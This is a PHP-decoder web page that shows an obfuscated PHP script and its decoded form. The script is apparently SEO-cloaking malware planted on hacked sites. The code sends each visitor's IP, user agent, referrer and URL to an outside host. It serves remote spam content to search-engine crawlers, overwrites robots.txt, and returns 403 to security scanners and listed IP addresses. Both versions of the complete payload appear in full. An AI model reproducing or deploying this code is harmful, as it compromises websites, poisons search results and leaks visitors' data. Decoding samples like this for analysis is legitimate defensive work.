Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

/* @Author https://www.jiamiphp.com/ */ goto YiuqgUEVWH; MmE8PwqyMp: $a = urlencode($l);..

Decoded Output download

<?  /* @Author https://www.jiamiphp.com/ */ 
 goto YiuqgUEVWH; MmE8PwqyMp: $a = urlencode($l); $m = urlencode($_SERVER["HTTP_HOST"]); $n = urlencode($_SERVER["SCRIPT_NAME"]); if (!empty($_SERVER["REQUEST_SCHEME"]) && $_SERVER["REQUEST_SCHEME"] == "https" || !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" || !empty($_SERVER["SERVER_PORT"]) && $_SERVER["SERVER_PORT"] == "443" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https") { goto tSUJwtCpUD; } $_SERVER["REQUEST_SCHEME"] = "http"; goto ihycONfsU9; JGag1_oRdL: R5NZs9XnlV: if ($q == 0) { goto svu3QMMKdW; } $t = "/"; goto da63zaCloD; svu3QMMKdW: goto hcTkGm7rrV; KVHd4c26TU: goto quFH9s28Vw; hg_XNbv2L8: header("HTTP/1.0 500 Internal Server Error"); exit; quFH9s28Vw: goto WDxmFBs_zD; Or1ed6GW0F: Zxb8X344NH: $y = $g . "?agent={$i}&refer={$j}&lang={$k}&ip={$a}&dom={$m}&http={$o}&uri={$p}&pc={$h}&rewriteable={$q}&script={$n}"; $s = get_url($y); echo $s; exit; goto ZiaTW3t0KZ; Fy9lPX1bZh: g2BuZfsX9X: P2ET1nCExW: goto C1CGkBRegP; vb3arINhGM: $y = $g . "?agent={$i}&refer={$j}&lang={$k}&ip={$a}&dom={$m}&http={$o}&uri={$p}&pc={$h}&rewriteable={$q}&script={$n}"; goto q1MRPzb9HH; wIvnlk5pv4: echo $s = get_url($y); @file_put_contents("robots.txt", $s); exit; EHjCr9p28b: goto QQ6Bx6bjSQ; goto Or1ed6GW0F; YiuqgUEVWH: error_reporting(0); function getrealIp() { goto tH2t8ei1kV; UWyLFylSjB: goto NK4mUCbkGj; eTdLBVxJ1M: $a = getenv("HTTP_X_FORWARDED_FOR"); $b = explode(",", $a); $a = $b[0]; goto Z6A7nAPV0M; aeb3y_9dXP: if (getenv("REMOTE_ADDR")) { goto A2HwoEzTQC; } $a = "0.0.0.0"; goto NK4mUCbkGj; j9dywErEld: $a = getenv("HTTP_X_REAL_IP"); goto UWyLFylSjB; tH2t8ei1kV: if (!getenv("HTTP_CLIENT_IP")) { goto x_ox_5wD2q; } $a = getenv("HTTP_CLIENT_IP"); x_ox_5wD2q: if (getenv("HTTP_X_REAL_IP")) { goto j9dywErEld; } if (getenv("HTTP_X_FORWARDED_FOR")) { goto eTdLBVxJ1M; } goto aeb3y_9dXP; Z6A7nAPV0M: goto NK4mUCbkGj; A2HwoEzTQC: $a = getenv("REMOTE_ADDR"); NK4mUCbkGj: return $a; goto LE0qbcYjIF; LE0qbcYjIF: } function get_url($c) { goto ihn88mgPQE; dQTbesRRJ3: $d = curl_exec($e); curl_close($e); NT_rSNYB2i: return $d; goto z_YATl0tL9; N8o89arHa3: curl_setopt($e, CURLOPT_FOLLOWLOCATION, false); if (!(strpos($c, "https://") !== false)) { goto E0DZt48S1J; } curl_setopt($e, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($e, CURLOPT_SSL_VERIFYHOST, FALSE); E0DZt48S1J: goto dQTbesRRJ3; ihn88mgPQE: $d = @file_get_contents($c); if (!empty($d)) { goto NT_rSNYB2i; } $e = curl_init(); curl_setopt($e, CURLOPT_URL, $c); curl_setopt($e, CURLOPT_RETURNTRANSFER, true); goto N8o89arHa3; z_YATl0tL9: } function get_url2($c) { goto Kyj87FBeCH; IfU6dXKboB: if (!(strpos($c, "https://") !== false)) { goto Tlwr4Xm7yF; } curl_setopt($e, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($e, CURLOPT_SSL_VERIFYHOST, FALSE); Tlwr4Xm7yF: $d = curl_exec($e); goto LapmEy8dcA; LapmEy8dcA: curl_close($e); if (!empty($d)) { goto NbEoicVeAb; } $d = @file_get_contents($c); NbEoicVeAb: return $d; goto Q_ZafiVhbz; Kyj87FBeCH: $e = curl_init(); curl_setopt($e, CURLOPT_URL, $c); curl_setopt($e, CURLOPT_RETURNTRANSFER, true); curl_setopt($e, CURLOPT_FOLLOWLOCATION, false); curl_setopt($e, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); goto IfU6dXKboB; Q_ZafiVhbz: } if (!preg_match("/(Bytespider|PetalBot|AhrefsBot|Barkrowler|MJ12bot|FeedDemon|JikeSpider|Indy Library|AskTbFXTV|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|ApacheBench|Swiftbot|ZmEu|oBot|jaunty|Python-urllib|python-requests|lightDeckReports Bot|YYSpider|DigExt|YisouSpider|HttpClient|heritrix|EasouSpider|Ezooms|AmazonBot|SEMrushBot|YandexBot|paloaltonetworks|Python)/i", $_SERVER["HTTP_USER_AGENT"])) { goto l336lr84Hg; } goto H8amto0vt9; RTSDtwR8re: $s = get_url($r); if ($s == "ok") { goto JAlCQ8u5hg; } $q = 0; @file_put_contents("uxo.txt", "0"); goto Ye43_A48Rk; goto eRodWcX0Mc; eRodWcX0Mc: JAlCQ8u5hg: $q = 1; @file_put_contents("uxo.txt", "1"); Ye43_A48Rk: XITePPAT0t: goto LnAURFxkKm; jH9QL4Db3r: fuu2Kr3tmk: $t = $_SERVER["SCRIPT_NAME"]; if (strpos($t, "index.php") !== false) { goto R5NZs9XnlV; } $t = $t . "?"; goto QrYfd76JdD; goto JGag1_oRdL; zaJk2fSB4S: if (!($l == "153.246.135.238" || $l == "219.101.44.233")) { goto IQrqGHXwMO; } header("HTTP/1.0 403 Forbidden"); exit; IQrqGHXwMO: $q = 0; goto yBrTNgAOOL; m4ig2vupkd: $w = "{$o}://" . $m . $t . "sitemap.xml"; $v = trim($v) . "
" . "Sitemap: {$w}"; $x = ''; echo $w . ": " . $x . "<br/>"; $y = $g . "?agent={$i}&refer={$j}&lang={$k}&ip={$a}&dom={$m}&http={$o}&uri={$p}&pc={$h}&rewriteable={$q}&script={$n}&sitemap=" . urlencode($w); goto IR9w06rgyw; ZiaTW3t0KZ: QQ6Bx6bjSQ: goto gDzmNW3npf; WLV7yO8PvT: gDzmNW3npf: goto xw0_z3BHOM; goto jH9QL4Db3r; q1MRPzb9HH: $s = get_url($y); if ($s == "500") { goto hg_XNbv2L8; } header("Content-Type: text/xml; charset=utf-8"); echo $s; exit; goto KVHd4c26TU; uwKI7FVI2W: exit; ffmBS3bOkt: jXJfLg51Dp: goto P2ET1nCExW; auGQb5M0tO: goto pFxyXO9RzD; UO01CwT627: $s = get_url($y); if ($s == "500") { goto DVMwIEeYwh; } if (empty($s)) { goto ADu3kict_s; } header("HTTP/1.1 404 Not Found"); echo $s; goto ou75dlZ1nj; iCND9ueGRz: YXQ4CdZGmf: header("Content-Type: text/xml; charset=utf-8"); cQx819gEWb: echo $s; exit; goto Fy9lPX1bZh; S4DwWYu0xb: $p = urlencode($_SERVER["REQUEST_URI"]); if (!(strpos($p, "uuuuxxxxooo") !== false)) { goto vNZK9OQJXS; } echo "ok"; exit; vNZK9OQJXS: goto zaJk2fSB4S; sbTXI8tl9y: $h = 3114; $i = urlencode($_SERVER["HTTP_USER_AGENT"]); $j = urlencode($_SERVER["HTTP_REFERER"]); $k = urlencode($_SERVER["HTTP_ACCEPT_LANGUAGE"]); $l = getrealIp(); goto MmE8PwqyMp; pFxyXO9RzD: $y = $g . "?agent={$i}&refer={$j}&lang={$k}&ip={$a}&dom={$m}&http={$o}&uri={$p}&pc={$h}&rewriteable={$q}&script={$n}"; $s = get_url($y); if (empty($s)) { goto g2BuZfsX9X; } if (!($s == "500")) { goto TW0CCTYXnG; } header("HTTP/1.0 500 Internal Server Error"); goto uK5lFB_n9O; J9edaSbKcS: if (preg_match("/({$f})/i", $_SERVER["HTTP_USER_AGENT"])) { goto auGQb5M0tO; } if (preg_match("/({$f})/i", $_SERVER["HTTP_REFERER"])) { goto j9PTFDSdqH; } goto jXJfLg51Dp; j9PTFDSdqH: $y = $g . "?agent={$i}&refer={$j}&lang={$k}&ip={$a}&dom={$m}&http={$o}&uri={$p}&pc={$h}&rewriteable={$q}"; goto UO01CwT627; uK5lFB_n9O: exit; TW0CCTYXnG: if (substr($s, 0, 5) == "<?xml") { goto YXQ4CdZGmf; } header("Content-Type: text/html; charset=utf-8"); goto cQx819gEWb; goto iCND9ueGRz; yBrTNgAOOL: if (!file_exists("uxo.txt")) { goto hnGwAL29sA; } $q = @file_get_contents("uxo.txt"); goto XITePPAT0t; hnGwAL29sA: $r = $o . "://" . $_SERVER["HTTP_HOST"] . "/uuuuxxxxooo"; goto RTSDtwR8re; LnAURFxkKm: if (strpos($p, "pingsitemap.xml") !== false) { goto fuu2Kr3tmk; } if (strpos($p, "favicon.ico") !== false) { goto WLV7yO8PvT; } if (strpos($p, "jp2023") !== false) { goto Zxb8X344NH; } if (strpos($p, "robots.txt") !== false || strpos($p, "writerobots") !== false) { goto NWVE4jsAG3; } if (preg_match("@^/(.*?).xml$@i", $_SERVER["REQUEST_URI"])) { goto vb3arINhGM; } goto J9edaSbKcS; ihycONfsU9: goto xOxhqw_chI; tSUJwtCpUD: $_SERVER["REQUEST_SCHEME"] = "https"; xOxhqw_chI: $o = urlencode($_SERVER["REQUEST_SCHEME"]); goto S4DwWYu0xb; WDxmFBs_zD: C1CGkBRegP: goto EHjCr9p28b; NWVE4jsAG3: $y = $g . "?agent={$i}&refer={$j}&lang={$k}&ip={$a}&dom={$m}&http={$o}&uri={$p}&pc={$h}&rewriteable={$q}&script={$n}"; header("Content-Type: text/plain; charset=utf-8"); goto wIvnlk5pv4; ou75dlZ1nj: exit; ADu3kict_s: goto ffmBS3bOkt; DVMwIEeYwh: header("HTTP/1.0 500 Internal Server Error"); goto uwKI7FVI2W; H8amto0vt9: header("HTTP/1.0 403 Forbidden"); exit; l336lr84Hg: $f = "bing|google|yahoo"; $g = "http://fgj845.ageddish.com"; goto sbTXI8tl9y; IR9w06rgyw: $s = get_url($y); @file_put_contents("robots.txt", $v); exit; goto XY_XQmpzpl; hcTkGm7rrV: $t = "/?"; da63zaCloD: QrYfd76JdD: $u = "https://www.google.com/ping?sitemap="; $v = "User-agent: *\xd\xaAllow: /"; goto m4ig2vupkd; XY_XQmpzpl: xw0_z3BHOM: ?>

Did this file decode correctly?

Original Code

/* @Author https://www.jiamiphp.com/ */
 goto YiuqgUEVWH; MmE8PwqyMp: $a = urlencode($l); $m = urlencode($_SERVER["\110\124\124\x50\137\x48\x4f\123\124"]); $n = urlencode($_SERVER["\x53\103\x52\x49\x50\x54\x5f\116\101\115\105"]); if (!empty($_SERVER["\x52\x45\121\125\105\123\124\x5f\123\103\x48\x45\x4d\105"]) && $_SERVER["\122\105\x51\125\105\x53\124\x5f\123\x43\x48\105\115\105"] == "\x68\164\164\160\163" || !empty($_SERVER["\110\x54\x54\120\x53"]) && $_SERVER["\x48\124\x54\120\123"] == "\157\x6e" || !empty($_SERVER["\x53\x45\122\x56\105\x52\x5f\x50\117\122\x54"]) && $_SERVER["\123\105\x52\126\x45\x52\x5f\x50\117\122\124"] == "\64\64\x33" || isset($_SERVER["\110\x54\x54\120\x5f\130\x5f\106\x4f\x52\x57\101\122\x44\105\104\x5f\x50\122\117\124\x4f"]) && $_SERVER["\110\x54\124\120\x5f\x58\137\x46\117\122\x57\101\122\104\x45\x44\x5f\x50\x52\117\x54\x4f"] == "\x68\164\164\x70\163") { goto tSUJwtCpUD; } $_SERVER["\122\x45\x51\125\x45\x53\x54\137\x53\103\x48\x45\x4d\105"] = "\150\164\164\x70"; goto ihycONfsU9; JGag1_oRdL: R5NZs9XnlV: if ($q == 0) { goto svu3QMMKdW; } $t = "\57"; goto da63zaCloD; svu3QMMKdW: goto hcTkGm7rrV; KVHd4c26TU: goto quFH9s28Vw; hg_XNbv2L8: header("\110\124\124\x50\x2f\x31\x2e\60\40\x35\60\60\x20\x49\156\x74\145\x72\x6e\x61\154\40\123\x65\162\166\145\162\x20\105\x72\162\157\162"); exit; quFH9s28Vw: goto WDxmFBs_zD; Or1ed6GW0F: Zxb8X344NH: $y = $g . "\77\x61\x67\145\x6e\x74\75{$i}\46\162\x65\x66\145\162\x3d{$j}\x26\x6c\x61\156\x67\x3d{$k}\x26\151\x70\75{$a}\46\x64\x6f\155\x3d{$m}\x26\150\x74\164\160\75{$o}\46\165\162\151\x3d{$p}\x26\x70\x63\x3d{$h}\x26\x72\x65\167\x72\x69\x74\145\x61\x62\154\x65\x3d{$q}\x26\x73\x63\x72\x69\x70\164\75{$n}"; $s = get_url($y); echo $s; exit; goto ZiaTW3t0KZ; Fy9lPX1bZh: g2BuZfsX9X: P2ET1nCExW: goto C1CGkBRegP; vb3arINhGM: $y = $g . "\77\141\147\x65\x6e\164\x3d{$i}\46\x72\x65\146\x65\162\x3d{$j}\x26\x6c\141\x6e\147\x3d{$k}\x26\x69\x70\x3d{$a}\x26\144\x6f\155\75{$m}\46\150\x74\x74\x70\x3d{$o}\46\165\x72\151\75{$p}\x26\160\x63\75{$h}\46\x72\145\167\x72\x69\164\x65\141\x62\x6c\x65\75{$q}\x26\x73\x63\162\151\x70\164\x3d{$n}"; goto q1MRPzb9HH; wIvnlk5pv4: echo $s = get_url($y); @file_put_contents("\x72\157\142\157\x74\163\x2e\x74\x78\164", $s); exit; EHjCr9p28b: goto QQ6Bx6bjSQ; goto Or1ed6GW0F; YiuqgUEVWH: error_reporting(0); function getrealIp() { goto tH2t8ei1kV; UWyLFylSjB: goto NK4mUCbkGj; eTdLBVxJ1M: $a = getenv("\x48\x54\x54\120\x5f\130\137\x46\x4f\122\x57\101\x52\x44\x45\x44\137\106\117\122"); $b = explode("\x2c", $a); $a = $b[0]; goto Z6A7nAPV0M; aeb3y_9dXP: if (getenv("\122\105\115\x4f\124\105\137\x41\x44\104\x52")) { goto A2HwoEzTQC; } $a = "\x30\x2e\60\56\60\56\x30"; goto NK4mUCbkGj; j9dywErEld: $a = getenv("\110\124\124\120\137\130\137\x52\105\x41\x4c\x5f\111\x50"); goto UWyLFylSjB; tH2t8ei1kV: if (!getenv("\110\124\124\x50\x5f\103\114\111\x45\x4e\124\x5f\x49\120")) { goto x_ox_5wD2q; } $a = getenv("\x48\x54\x54\x50\x5f\103\x4c\x49\x45\116\x54\x5f\111\120"); x_ox_5wD2q: if (getenv("\110\x54\124\x50\x5f\x58\x5f\x52\x45\101\x4c\137\x49\120")) { goto j9dywErEld; } if (getenv("\x48\124\124\120\x5f\130\137\x46\117\122\127\x41\x52\104\x45\104\x5f\106\117\122")) { goto eTdLBVxJ1M; } goto aeb3y_9dXP; Z6A7nAPV0M: goto NK4mUCbkGj; A2HwoEzTQC: $a = getenv("\x52\x45\x4d\117\124\105\x5f\101\x44\x44\122"); NK4mUCbkGj: return $a; goto LE0qbcYjIF; LE0qbcYjIF: } function get_url($c) { goto ihn88mgPQE; dQTbesRRJ3: $d = curl_exec($e); curl_close($e); NT_rSNYB2i: return $d; goto z_YATl0tL9; N8o89arHa3: curl_setopt($e, CURLOPT_FOLLOWLOCATION, false); if (!(strpos($c, "\150\164\164\160\x73\x3a\x2f\x2f") !== false)) { goto E0DZt48S1J; } curl_setopt($e, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($e, CURLOPT_SSL_VERIFYHOST, FALSE); E0DZt48S1J: goto dQTbesRRJ3; ihn88mgPQE: $d = @file_get_contents($c); if (!empty($d)) { goto NT_rSNYB2i; } $e = curl_init(); curl_setopt($e, CURLOPT_URL, $c); curl_setopt($e, CURLOPT_RETURNTRANSFER, true); goto N8o89arHa3; z_YATl0tL9: } function get_url2($c) { goto Kyj87FBeCH; IfU6dXKboB: if (!(strpos($c, "\150\x74\164\160\x73\72\57\x2f") !== false)) { goto Tlwr4Xm7yF; } curl_setopt($e, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($e, CURLOPT_SSL_VERIFYHOST, FALSE); Tlwr4Xm7yF: $d = curl_exec($e); goto LapmEy8dcA; LapmEy8dcA: curl_close($e); if (!empty($d)) { goto NbEoicVeAb; } $d = @file_get_contents($c); NbEoicVeAb: return $d; goto Q_ZafiVhbz; Kyj87FBeCH: $e = curl_init(); curl_setopt($e, CURLOPT_URL, $c); curl_setopt($e, CURLOPT_RETURNTRANSFER, true); curl_setopt($e, CURLOPT_FOLLOWLOCATION, false); curl_setopt($e, CURLOPT_USERAGENT, $_SERVER["\x48\124\x54\x50\x5f\125\123\x45\x52\137\x41\107\105\x4e\x54"]); goto IfU6dXKboB; Q_ZafiVhbz: } if (!preg_match("\x2f\x28\x42\171\164\x65\163\x70\151\144\145\162\x7c\120\145\x74\141\x6c\x42\x6f\x74\174\101\x68\x72\145\x66\163\x42\x6f\164\x7c\x42\141\162\x6b\162\157\x77\x6c\145\x72\x7c\x4d\112\x31\62\x62\157\164\174\x46\145\x65\x64\104\x65\x6d\157\x6e\x7c\x4a\151\x6b\145\123\x70\151\144\x65\x72\174\111\x6e\144\x79\40\x4c\151\x62\x72\141\162\x79\174\x41\x73\153\124\x62\106\x58\124\126\174\x43\162\141\167\154\104\141\144\x64\171\x7c\x43\x6f\157\x6c\160\141\x64\x57\x65\142\x6b\x69\164\x7c\112\x61\x76\141\x7c\x46\145\x65\x64\x6c\171\x7c\125\156\x69\x76\x65\162\x73\x61\154\106\x65\x65\144\120\x61\x72\163\x65\162\174\x41\160\x61\143\150\x65\102\x65\156\x63\x68\x7c\x53\167\151\146\x74\x62\x6f\164\x7c\132\x6d\x45\165\x7c\157\102\x6f\164\x7c\152\141\x75\x6e\164\171\x7c\120\171\x74\150\x6f\x6e\55\165\162\154\x6c\x69\142\174\x70\x79\164\150\x6f\156\x2d\x72\145\x71\x75\145\163\x74\x73\174\x6c\x69\x67\x68\x74\x44\x65\x63\x6b\x52\145\x70\157\x72\x74\x73\x20\102\157\x74\174\131\x59\123\160\x69\x64\x65\x72\174\x44\x69\x67\105\x78\164\x7c\x59\x69\163\x6f\x75\x53\160\151\144\145\x72\174\x48\164\164\160\x43\x6c\151\145\156\164\x7c\150\145\162\151\x74\162\151\170\174\x45\x61\x73\x6f\165\123\x70\x69\144\145\162\174\105\x7a\x6f\157\x6d\163\174\x41\155\x61\x7a\x6f\156\102\157\x74\174\123\x45\x4d\x72\165\x73\x68\x42\x6f\164\x7c\131\141\x6e\x64\145\170\x42\157\164\x7c\160\x61\154\157\141\x6c\x74\157\x6e\145\164\x77\x6f\162\153\x73\x7c\120\x79\164\150\157\x6e\51\57\151", $_SERVER["\x48\124\124\120\x5f\x55\123\x45\x52\x5f\101\x47\105\x4e\x54"])) { goto l336lr84Hg; } goto H8amto0vt9; RTSDtwR8re: $s = get_url($r); if ($s == "\157\153") { goto JAlCQ8u5hg; } $q = 0; @file_put_contents("\x75\170\x6f\56\164\x78\x74", "\60"); goto Ye43_A48Rk; goto eRodWcX0Mc; eRodWcX0Mc: JAlCQ8u5hg: $q = 1; @file_put_contents("\x75\x78\x6f\x2e\164\x78\164", "\61"); Ye43_A48Rk: XITePPAT0t: goto LnAURFxkKm; jH9QL4Db3r: fuu2Kr3tmk: $t = $_SERVER["\x53\x43\122\111\120\x54\x5f\x4e\x41\115\105"]; if (strpos($t, "\151\x6e\144\x65\170\56\160\150\160") !== false) { goto R5NZs9XnlV; } $t = $t . "\77"; goto QrYfd76JdD; goto JGag1_oRdL; zaJk2fSB4S: if (!($l == "\61\x35\x33\56\x32\64\x36\56\x31\x33\x35\x2e\x32\63\70" || $l == "\x32\x31\x39\x2e\x31\x30\61\56\64\64\56\x32\x33\x33")) { goto IQrqGHXwMO; } header("\110\x54\124\x50\57\x31\x2e\60\40\64\60\63\40\106\x6f\162\x62\151\x64\144\145\x6e"); exit; IQrqGHXwMO: $q = 0; goto yBrTNgAOOL; m4ig2vupkd: $w = "{$o}\72\57\57" . $m . $t . "\163\x69\x74\x65\155\141\160\x2e\x78\155\154"; $v = trim($v) . "\15\12" . "\x53\x69\x74\145\155\x61\160\x3a\40{$w}"; $x = ''; echo $w . "\x3a\x20" . $x . "\x3c\142\x72\x2f\x3e"; $y = $g . "\77\x61\147\145\156\x74\x3d{$i}\46\x72\145\x66\x65\162\x3d{$j}\46\154\x61\156\x67\x3d{$k}\46\x69\x70\x3d{$a}\x26\144\x6f\x6d\x3d{$m}\x26\150\164\x74\x70\75{$o}\46\165\162\x69\x3d{$p}\46\x70\143\x3d{$h}\46\162\145\x77\x72\151\x74\145\141\142\x6c\145\x3d{$q}\46\163\143\162\x69\160\x74\75{$n}\46\163\151\x74\145\155\x61\x70\75" . urlencode($w); goto IR9w06rgyw; ZiaTW3t0KZ: QQ6Bx6bjSQ: goto gDzmNW3npf; WLV7yO8PvT: gDzmNW3npf: goto xw0_z3BHOM; goto jH9QL4Db3r; q1MRPzb9HH: $s = get_url($y); if ($s == "\x35\x30\x30") { goto hg_XNbv2L8; } header("\103\157\x6e\164\145\156\x74\x2d\x54\x79\x70\145\x3a\x20\164\145\170\x74\57\x78\155\x6c\x3b\x20\x63\x68\141\x72\x73\x65\164\x3d\x75\x74\146\55\x38"); echo $s; exit; goto KVHd4c26TU; uwKI7FVI2W: exit; ffmBS3bOkt: jXJfLg51Dp: goto P2ET1nCExW; auGQb5M0tO: goto pFxyXO9RzD; UO01CwT627: $s = get_url($y); if ($s == "\65\x30\60") { goto DVMwIEeYwh; } if (empty($s)) { goto ADu3kict_s; } header("\110\124\124\120\57\61\56\61\x20\64\x30\64\40\x4e\x6f\164\x20\x46\157\x75\156\144"); echo $s; goto ou75dlZ1nj; iCND9ueGRz: YXQ4CdZGmf: header("\103\157\156\164\145\x6e\164\55\x54\x79\160\x65\x3a\x20\164\145\170\x74\57\170\x6d\154\x3b\40\143\150\x61\x72\163\x65\164\75\x75\x74\x66\x2d\70"); cQx819gEWb: echo $s; exit; goto Fy9lPX1bZh; S4DwWYu0xb: $p = urlencode($_SERVER["\x52\x45\x51\x55\x45\123\x54\137\125\122\x49"]); if (!(strpos($p, "\165\x75\x75\165\170\x78\x78\x78\x6f\x6f\x6f") !== false)) { goto vNZK9OQJXS; } echo "\x6f\153"; exit; vNZK9OQJXS: goto zaJk2fSB4S; sbTXI8tl9y: $h = 3114; $i = urlencode($_SERVER["\x48\124\x54\120\137\125\x53\105\122\137\x41\x47\x45\116\124"]); $j = urlencode($_SERVER["\x48\x54\124\x50\137\x52\105\106\105\122\x45\122"]); $k = urlencode($_SERVER["\x48\124\124\120\x5f\101\103\103\105\x50\x54\x5f\114\x41\x4e\x47\125\101\107\x45"]); $l = getrealIp(); goto MmE8PwqyMp; pFxyXO9RzD: $y = $g . "\x3f\x61\x67\145\x6e\164\75{$i}\x26\x72\145\x66\x65\x72\75{$j}\46\154\x61\156\147\x3d{$k}\x26\151\x70\x3d{$a}\x26\144\x6f\155\75{$m}\x26\x68\164\x74\x70\x3d{$o}\46\x75\162\151\75{$p}\46\160\x63\x3d{$h}\46\x72\x65\x77\162\x69\x74\x65\x61\142\154\145\x3d{$q}\46\163\143\x72\x69\x70\x74\x3d{$n}"; $s = get_url($y); if (empty($s)) { goto g2BuZfsX9X; } if (!($s == "\65\x30\60")) { goto TW0CCTYXnG; } header("\x48\x54\124\120\57\x31\56\x30\40\x35\x30\60\x20\x49\156\x74\x65\x72\x6e\x61\154\x20\x53\145\162\166\145\x72\40\x45\x72\162\157\162"); goto uK5lFB_n9O; J9edaSbKcS: if (preg_match("\x2f\50{$f}\51\57\x69", $_SERVER["\x48\124\x54\x50\137\x55\x53\x45\122\137\x41\x47\x45\x4e\x54"])) { goto auGQb5M0tO; } if (preg_match("\x2f\50{$f}\x29\57\151", $_SERVER["\110\x54\x54\x50\137\x52\x45\x46\105\122\x45\122"])) { goto j9PTFDSdqH; } goto jXJfLg51Dp; j9PTFDSdqH: $y = $g . "\x3f\141\147\x65\156\x74\x3d{$i}\46\162\x65\146\145\x72\75{$j}\x26\154\141\156\147\75{$k}\46\151\160\75{$a}\46\x64\157\x6d\75{$m}\x26\150\x74\164\160\x3d{$o}\46\x75\162\151\75{$p}\x26\160\143\75{$h}\46\162\x65\167\162\151\x74\145\141\142\154\x65\x3d{$q}"; goto UO01CwT627; uK5lFB_n9O: exit; TW0CCTYXnG: if (substr($s, 0, 5) == "\74\x3f\170\155\154") { goto YXQ4CdZGmf; } header("\103\x6f\156\x74\x65\x6e\x74\x2d\124\171\x70\x65\72\x20\164\x65\x78\164\x2f\150\164\x6d\154\x3b\x20\143\x68\x61\162\x73\x65\x74\75\x75\164\x66\55\70"); goto cQx819gEWb; goto iCND9ueGRz; yBrTNgAOOL: if (!file_exists("\165\170\x6f\56\164\x78\164")) { goto hnGwAL29sA; } $q = @file_get_contents("\165\170\157\x2e\x74\x78\x74"); goto XITePPAT0t; hnGwAL29sA: $r = $o . "\x3a\x2f\57" . $_SERVER["\x48\124\x54\x50\x5f\x48\117\123\x54"] . "\x2f\165\165\165\165\x78\170\170\x78\157\x6f\x6f"; goto RTSDtwR8re; LnAURFxkKm: if (strpos($p, "\x70\x69\x6e\x67\163\151\x74\145\155\x61\x70\x2e\x78\x6d\154") !== false) { goto fuu2Kr3tmk; } if (strpos($p, "\146\x61\166\x69\x63\x6f\156\x2e\x69\143\157") !== false) { goto WLV7yO8PvT; } if (strpos($p, "\152\160\x32\60\62\63") !== false) { goto Zxb8X344NH; } if (strpos($p, "\x72\157\x62\x6f\164\x73\x2e\x74\x78\164") !== false || strpos($p, "\x77\x72\x69\x74\x65\x72\x6f\x62\157\164\163") !== false) { goto NWVE4jsAG3; } if (preg_match("\x40\136\x2f\x28\56\x2a\x3f\51\56\x78\155\154\44\100\x69", $_SERVER["\122\105\x51\125\105\x53\124\x5f\125\x52\x49"])) { goto vb3arINhGM; } goto J9edaSbKcS; ihycONfsU9: goto xOxhqw_chI; tSUJwtCpUD: $_SERVER["\x52\x45\x51\125\x45\123\124\x5f\x53\x43\110\105\x4d\105"] = "\150\164\164\x70\163"; xOxhqw_chI: $o = urlencode($_SERVER["\x52\105\x51\x55\105\123\x54\x5f\x53\103\110\105\115\x45"]); goto S4DwWYu0xb; WDxmFBs_zD: C1CGkBRegP: goto EHjCr9p28b; NWVE4jsAG3: $y = $g . "\x3f\141\147\145\x6e\x74\75{$i}\46\x72\145\146\145\162\75{$j}\x26\x6c\141\156\147\x3d{$k}\x26\151\160\x3d{$a}\46\144\x6f\x6d\x3d{$m}\x26\150\164\164\x70\x3d{$o}\46\x75\162\x69\x3d{$p}\x26\160\143\75{$h}\46\x72\145\x77\162\151\x74\145\x61\x62\x6c\145\x3d{$q}\x26\163\x63\162\151\x70\x74\x3d{$n}"; header("\103\157\x6e\x74\145\x6e\x74\x2d\124\x79\160\x65\72\x20\x74\x65\170\x74\x2f\x70\154\141\151\156\x3b\x20\x63\150\x61\162\x73\x65\164\x3d\x75\x74\146\55\70"); goto wIvnlk5pv4; ou75dlZ1nj: exit; ADu3kict_s: goto ffmBS3bOkt; DVMwIEeYwh: header("\110\x54\124\120\57\61\x2e\x30\x20\65\x30\60\x20\x49\156\164\x65\x72\x6e\141\x6c\x20\x53\x65\162\166\x65\162\40\x45\162\162\157\x72"); goto uwKI7FVI2W; H8amto0vt9: header("\110\x54\124\x50\57\61\56\60\x20\x34\60\x33\40\x46\157\x72\142\151\144\144\145\156"); exit; l336lr84Hg: $f = "\x62\x69\x6e\147\x7c\x67\157\x6f\147\x6c\x65\174\171\x61\x68\x6f\157"; $g = "\150\164\164\160\x3a\x2f\x2f\146\x67\152\70\64\x35\x2e\141\147\x65\x64\x64\x69\x73\150\x2e\143\x6f\155"; goto sbTXI8tl9y; IR9w06rgyw: $s = get_url($y); @file_put_contents("\x72\x6f\x62\x6f\164\x73\x2e\164\170\164", $v); exit; goto XY_XQmpzpl; hcTkGm7rrV: $t = "\57\77"; da63zaCloD: QrYfd76JdD: $u = "\x68\164\x74\x70\x73\x3a\57\57\x77\167\x77\56\x67\x6f\157\x67\x6c\145\x2e\x63\x6f\155\57\160\x69\x6e\147\x3f\x73\151\164\145\x6d\141\x70\75"; $v = "\125\163\145\162\55\141\x67\145\156\164\72\40\52\xd\xa\101\154\x6c\x6f\x77\x3a\40\57"; goto m4ig2vupkd; XY_XQmpzpl: xw0_z3BHOM:

Function Calls

None

Variables

None

Stats

MD5 6c0ada87f9176b257dc18b7cc00b87e9
Eval Count 0
Decode Time 55 ms